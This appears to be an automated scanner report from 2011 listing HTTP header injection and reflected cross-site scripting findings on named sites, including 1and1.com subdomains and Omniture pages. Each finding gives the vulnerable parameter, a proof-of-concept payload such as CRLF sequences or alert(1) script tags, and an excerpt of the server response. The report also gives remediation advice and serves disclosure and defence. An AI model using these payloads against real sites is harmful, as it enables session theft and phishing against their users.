HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 3 is copied into the Location response header. The payload 2ddde%0d%0a15f27619d53 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload 3c70c%0d%0ac7d3ec588de was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload f6651%0d%0a1f3ed0baf2c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload f81df%0d%0a8ac77d3226 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload cf19b%0d%0abd512bc408d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
1.6. http://mywebsite.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mywebsite.1and1.com
Path: /Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bf42f%0d%0a0a2e5487a6a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The value of the origin.page request parameter is copied into the Location response header. The payload 11d40%0d%0aec5e36e0f3b was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload bef90%0d%0a11c14971bbd was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of the startClub request parameter is copied into the Location response header. The payload e979c%0d%0a3195436f668 was submitted in the startClub parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 1d2d8%0d%0a4b0a099611f was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
The value of the __lf request parameter is copied into the Location response header. The payload 1e4d2%0d%0aaf47e65b5a was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 47245%0d%0a60df6232878 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
1.13. http://order.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://order.1and1.com
Path: /Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e2d51%0d%0af6b299eb523 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The value of the origin.page request parameter is copied into the Location response header. The payload 654e6%0d%0a476e9112dfd was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
The value of the page request parameter is copied into the Location response header. The payload c1508%0d%0aa00c42b9c91 was submitted in the page parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload 97bdb%0d%0aefd6c702fd1 was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload 3d157%0d%0ac8839f14f03 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a90"><script>alert(1)</script>217a337aa5b was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82846'%3balert(1)//bc7259a2a3e was submitted in the clk parameter. This input was echoed as 82846';alert(1)//bc7259a2a3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 729
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSVWA084117885=uid=7016340; expires=Mon, 17-Oct-2011 00:23:30 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSVWA084=pctm=3&FM144706=3&fpt=0%2C117885%2C&pct%5Fdate=4306&pctl=117885&FL117885=3&pctc=144706&FQ=3; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:30 GMT
Connection: close
<html><body> <script type="text/javascript"> if (typeof(fd_clk) == 'undefined') {var fd_clk = '82846';alert(1)//bc7259a2a3ehttp://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=144706';}; var fd_imp='http://cdn.adsfac.eu/ads/VWA084/144706.0.0.swf'; var fd_bak='http://adsfac.eu/creative.asp?CreativeID=144706'; var fd_b ...[SNIP]...
The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc72"><script>alert(1)</script>f885aaf88a2 was submitted in the clk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c33b9<script>alert(1)</script>6afa09c7826 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload e350b<img%20src%3da%20onerror%3dalert(1)>6cc434dab0e was submitted in the action parameter. This input was echoed as e350b<img src=a onerror=alert(1)>6cc434dab0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8ec62<script>alert(1)</script>4b069b5a65f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 71a79<img%20src%3da%20onerror%3dalert(1)>9cea6436f9d was submitted in the mbox parameter. This input was echoed as 71a79<img src=a onerror=alert(1)>9cea6436f9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload e3302<script>alert(1)</script>df23f11db5e was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6b48c<script>alert(1)</script>d37c751e8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140f'%3balert(1)//810eef61a7b was submitted in the mboxFactoryId parameter. This input was echoed as 5140f';alert(1)//810eef61a7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67e3"><a>922b46dfc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found
Server: Omniture AWS/2.0.0
Last-Modified: Sun, 16 Oct 2011 00:58:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 48025
Cache-Control: public, max-age=14400
Expires: Sun, 16 Oct 2011 04:58:07 GMT
Date: Sun, 16 Oct 2011 00:58:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en"> <head> <title>Adobe Online Marketing Suite po ...[SNIP]... <link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=%0A%22%3E%3Ca%3Exsssssc67e3"><a>922b46dfc9f&ignore_skin=0" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b34"><a>51370b9834b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found
Server: Omniture AWS/2.0.0
Last-Modified: Sun, 16 Oct 2011 01:06:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 48129
Cache-Control: public, max-age=14400
Expires: Sun, 16 Oct 2011 05:06:32 GMT
Date: Sun, 16 Oct 2011 01:06:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en"> <head> <title>Adobe Online Marketing Suite po ...[SNIP]... <link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f51b34"><a>51370b9834b&ignore_skin=0" /> ...[SNIP]...
The value of the country request parameter is copied into the HTML document as plain text between tags. The payload 384cb<a>8a75cc362dc was submitted in the country parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the partnerid request parameter is copied into the HTML document as plain text between tags. The payload 6765b<a>552c8089353 was submitted in the partnerid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 13371<img%20src%3da%20onerror%3dalert(1)>6da321cd681 was submitted in the f parameter. This input was echoed as 13371<img src=a onerror=alert(1)>6da321cd681 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:23:11 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 198
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 028224
Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"tldListCommonAdditional13371<img src=a onerror=alert(1)>6da321cd681\" to access","ee":"ParameterException"}}}
The value of the m request parameter is copied into the HTML document as plain text between tags. The payload e2767<img%20src%3da%20onerror%3dalert(1)>8319f53054f was submitted in the m parameter. This input was echoed as e2767<img src=a onerror=alert(1)>8319f53054f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:59 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 215
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 518440
Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonDatae2767<img src=a onerror=alert(1)>8319f53054f\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}
The value of the o request parameter is copied into the HTML document as plain text between tags. The payload f37f7<img%20src%3da%20onerror%3dalert(1)>5a916765f3 was submitted in the o parameter. This input was echoed as f37f7<img src=a onerror=alert(1)>5a916765f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:47 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 198
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 838164
Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"jsonf37f7<img src=a onerror=alert(1)>5a916765f3\"","ee":"ServiceParameterException","p":["o"]}}}
The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 9c120<img%20src%3da%20onerror%3dalert(1)>0ebd76842c1 was submitted in the f parameter. This input was echoed as 9c120<img src=a onerror=alert(1)>0ebd76842c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:58 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 197
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 468307
Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"isEverLoggedInCustomer9c120<img src=a onerror=alert(1)>0ebd76842c1\" to access","ee":"ParameterException"}}}
The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 6f144<img%20src%3da%20onerror%3dalert(1)>8c14f811c07 was submitted in the m parameter. This input was echoed as 6f144<img src=a onerror=alert(1)>8c14f811c07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:49 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 215
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 865011
Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonData6f144<img src=a onerror=alert(1)>8c14f811c07\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}
The value of the o request parameter is copied into the HTML document as plain text between tags. The payload 367fc<img%20src%3da%20onerror%3dalert(1)>7f7f876415c was submitted in the o parameter. This input was echoed as 367fc<img src=a onerror=alert(1)>7f7f876415c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:41 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 199
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 028224
Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"json367fc<img src=a onerror=alert(1)>7f7f876415c\"","ee":"ServiceParameterException","p":["o"]}}}
Report generated by XSS.CX at Sun Oct 16 06:44:45 CDT 2011.